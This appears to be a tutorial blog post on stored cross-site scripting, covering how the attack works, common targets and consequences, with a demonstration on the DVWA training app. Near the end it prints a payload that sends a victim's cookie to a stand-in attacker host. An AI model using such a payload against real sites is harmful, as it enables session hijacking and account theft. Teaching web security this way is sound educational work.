- Attacker stores malicious code into the vulnerable page
- User authenticates in the application
- User visits vulnerable page
- Malicious code is executed by the user's browser
In order to successfully execute a stored XSS attack, the attacker has to locate a vulnerability in a web application and then inject malicious script into the server. One of the most frequent targets are websites that allow users to share content, including blogs, social networks, video sharing platforms and message boards etc. Every time the infected page is viewed, the malicious script is transmitted to the victim's browser.
With Stored XSS an attacker could conduct number of browser-based attacks, such as :
- Hijacking another user's browser
- Capturing sensitive information viewed by application users
- Defacement of the Website/Web Application
- Directed delivery of browser-based exploits
- Other malicious activities
Example of Stored XSS :
For demonstrating stored xss, we are going to use DVWA, and for xss payload we are going to use :
<script>alert(document.cookie)</script>
And after storing that malicious payload into web application, when the victim visits the vulnerable webpage, then the payload will executed.
but in real world scenario, the attacker would use more dangerous payload like :
<script>window.location='http://attacker.com/?cookie='+document.cookie</script>Conclusion :
Stored XSS attack is the most damaging attack as compared to other xss attacks, because unlike a reflected attack, where the script is activated after a link is clicked, a stored attack only requires that the victim visit the compromised web page. This increases the reach of the attack, endangering all visitors no matter their level of vigilance.
Links :
XSS Basics : Click here
Reflected XSS : Click here
DOM-Based XSS : Click here